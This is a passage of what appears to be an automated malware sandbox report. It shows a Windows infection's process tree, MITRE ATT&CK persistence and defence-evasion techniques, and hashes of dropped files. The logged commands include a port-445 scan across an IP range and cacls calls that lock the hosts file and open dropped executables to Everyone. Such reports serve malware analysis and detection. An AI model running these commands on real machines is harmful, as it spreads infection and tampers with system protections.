C:\Windows\ivullanlc\lgbbybeij\bjbduvwai.exebjbduvwai.exe TCP 191.101.0.1 191.101.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:8
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:1616
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4876
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:5028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4176
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4896
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:5624
-
-
-
C:\Windows\SysWOW64\lqrjma.exeC:\Windows\SysWOW64\lqrjma.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4824
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\zpnzavhu\fbnhtsh.exe /p everyone:F1⤵PID:4216
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3880
-
-
C:\Windows\system32\cacls.execacls C:\Windows\zpnzavhu\fbnhtsh.exe /p everyone:F2⤵PID:1080
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\fbnhtsh.exe1⤵PID:816
-
C:\Windows\ime\fbnhtsh.exeC:\Windows\ime\fbnhtsh.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1908
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\iaajsbnbu\blbkgb.exe /p everyone:F1⤵PID:4272
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4664
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\iaajsbnbu\blbkgb.exe /p everyone:F2⤵PID:5076
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\zpnzavhu\fbnhtsh.exe /p everyone:F1⤵PID:5140
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3096
-
-
C:\Windows\system32\cacls.execacls C:\Windows\zpnzavhu\fbnhtsh.exe /p everyone:F2⤵PID:5972
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\iaajsbnbu\blbkgb.exe /p everyone:F1⤵PID:5640
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5208
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\iaajsbnbu\blbkgb.exe /p everyone:F2⤵PID:6100
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\fbnhtsh.exe1⤵PID:116
-
C:\Windows\ime\fbnhtsh.exeC:\Windows\ime\fbnhtsh.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5764
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
4.2MB
MD5bed65f9fa62f56d90d9ef6ba1ef3f9c2
SHA15cd11d149c61fb3f65060dd14d84e7c704f6318e
SHA25652b28311e37e0304016d212740ca6255c1d839c6815d400c319182083404488c
SHA51246df23d3d888e71bacc200fc0265eda07f296c4aea72e18c7a9aaf786234388510c3fd1331ed9a8a8974315239b2cb31b2fc3db81d0f227d090bc71bcebdcae2
-
Filesize
3.8MB
MD521cdf3a7edb80a98e4014dea49368835
SHA11ea3a755a38aae838ee2ce38e1e96e07a7bdb32c
SHA25656876a8e366c3a8d6701de5b906a2876db05f4e371161440af3e4fbea5bd0256
SHA512449b1097f3060604ed263f07a8a5d8cd253f0e5b66f01a3ff020ecb2fe25e7c2b1cf7aac4db061d565924076cbdbdefb4c98846023fb486c66ccc02d01f938f9
-
Filesize
2.9MB
MD51b4b497fe8735c382d46d0238acef0c8
SHA1869d04c29509b7bccc4e18a790368d131ba09b63
SHA256a39acf5661e8f558e623bb460da4436e8271a849c2c5243db1a4e95b529de7aa
SHA512c6430ef747c3efb973e2e02c7c14ff98795b420f47d3e431c78129b9e0440aab377f1f280901a6ae6da3805394f4ea79213917ff97ef9f960870718f90fff6b5
-
Filesize
7.7MB
MD5e02ca40d45d4765b6f0299a0ab35c543
SHA10214e327a5342422823747f4471bc3c9f830f673
SHA256369f07e99fd1cdabbd63806ce98509941de25d16ac2789e068e940b127680423
SHA512ce8d6e6c0bae187d520911b03433d27d4795753a117f3335fa97edbd0bc66fdb2941114f9acb40d110af1a19cc1b1a5f384564df04125238681783959c1a26ed
-
Filesize
822KB
MD553ae0478f600e56101115833d60fdee0
SHA16c92680f107b6b384ab4cca04fc78b318f72b65c
SHA256e89561751e363364952010355be0664dcbe7470f2b2c5a2f6e5d7c62150d1900
SHA512f01832d6be98bdac4927c062111f388cbee1ae27fee6e2c968a294e27c8af7c8798520be06270fcb504c6054ab1306879a39637b3c10e693fd854242af29d85d
-
Filesize
26.0MB
MD5a8c8cbe75271670ea5880aa7c4458312
SHA141caea551afd31ca1843906d95329a919cf8656f
SHA256cdf66bd3037cccdfa5b7d98552a67e9751759997c32d99208206bf8029bb7a6a
SHA512b73d54501d3eab76869e968c37b2dca08b9b1957fb6fc003a968570c23e8b82c7341175593d73e862eb62b60a089377ef8116079d18e28a35bdde0fe7659ccc6
-
Filesize
2.6MB
MD5e556d6e62b7520ab1934cb74edbf5559
SHA1c5390a94311858084f77f56d70d829ea5f01d6f6
SHA256816cb50c697108f11f3c24ed4a30f29982686882d6339b1a12146adb16868d33
SHA51222a85d95c6b3d71f3e1c63f98b9395a6858473c8c9d36145953145ace386bc83e4a3a8f611f498013c8bfc816693e6b25c3e0e03968a23c7ed3ecdc3efae98a1
-
Filesize
33.1MB
MD5ed6008c3275c62b5bdd7e20e2f6045bf
SHA1c8039314dfc052458062d2a0d2491231b014d30e
SHA2560737adfda181521d7f67670ec10e268e1346cc342250a5dbdf954c20c7c609dd
SHA512d8716eba8dc69661ff1d50128589dc989962f91d1acff66bcf8c5dbcf16a9e396b94a9410cce81a9bb638606095d272ce50327f2a9e55c99125825094057e82f
-
Filesize
20.8MB
MD57165fc3d234b681d9f7738eba7cb7608
SHA1c79667efe83a698a3a08869b41f39cc11592aee2
SHA25600ceac34ed15194a05b355431e6108502922b42eb36a7ac349cde0d6006b01ef
SHA512ec9a3985d2146d0a562935372d4cde0652eb9a7c82d56ea7eb3a70ac9d61e14cf5b27e2c63e1d6ece8897669dae74aca84220784cc7bb144d6d21c9cd0f29f63
-
Filesize
8.6MB
MD541caa48527fd042ea97ef7550d9e0633
SHA18b62420a3a1f6c275f9fee2dff257c78d8e57689
SHA256344dbdc36b7e883625e362b084cd4973b4b6b69c81965fa065c26b802944c41d
SHA5121dbdf5ff059425cd0b563501e124bf472ed93f0bc90af017aaffb8cd1182d4cae51310031b50555a3473122053fdadd9b2275e6847f956d958a9cefe12a00c0a
-
Filesize
45.6MB
MD57d13fea92bd92bf86380f70725dd88e8
SHA178892869103afbf70bc044357873724feb89bb59
SHA25696b83d9b7e87e69cd0b5be1e32af5ee8f40f3a562bf5875536247de076361c5c
SHA5129b30990dadedac38deebbdf9f26fcc807acfb4f960a76c347b8d76c25d6a519bd493b8eb84338bbd155765dead43736d27b07a9551e39dccbe5bdfea0dc52ede
-
Filesize
1.2MB
MD56c0912699fab832bce43424be80ec1b7
SHA1f181df14a66126e041b6cad42c5d6c0517bf9cd0
SHA25649a4c407a21aa69520f4b6c33307ed5844123a05d190195ac576810025478d8e
SHA512e950df63bcd688aa4e49177bee8e633c6e58751b4ee0be7291bf06d4cad53d23da738584ef05ffd9368e5ef1d7aefeb97fe7be2d4f1aae9106b20040c38e935d
-
Filesize
8.6MB
MD57c0dcdb3e44f3128dfef605a767e395d
SHA13a9b275ed0fbec4e0ce574dc3c0aa3e61efa8428
SHA25608e29bb231ca7f34717c6c5a817edd4e5bedcf13e9a3dcb5a0dcd1bcd536bf9e
SHA512a26defcbc3896fd9fae3c6843f3598807db0066a8271c6f0def86c7440cdca70086d903e5e381c54aa9a4d32db04bea4fc84ecdb60c3bf018f1db249a0f39739
-
Filesize
1.9MB
MD5c145d8217e71b162a445142241d55cad
SHA15b22f62bc824b32556aa4265af9d52d27ff99157
SHA2565ae0d7a982652da1e0f61eaa35c78f356b4305b1c39413664893ff56d35a6268
SHA5120470fef85ee63f514ee47dde5e9014e8b6f5519213001cab19afa3318fa186ba415ff18fd329a4c1d9e9b5d0163c640debabc1c6870420225b1778143f61dcf0
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376
-
Filesize
7.5MB
MD5ddc9bedd2612e83fa428c7efe98ff859
SHA1af9c2b7efa09253744ba5c27d3e00be044bd28d2
SHA256de5f8f2faf3f8b10caa486b0c713ce5f1ed950f507d23bf026c72aca93c244f3
SHA512a8343d9bd8747da4ac62b72ed9072c09f42a7a8eb946ed324e9a14defe1a5963694b1194a8fb721092b8e059710613c930cefd088098edc25e6f5f21bf774362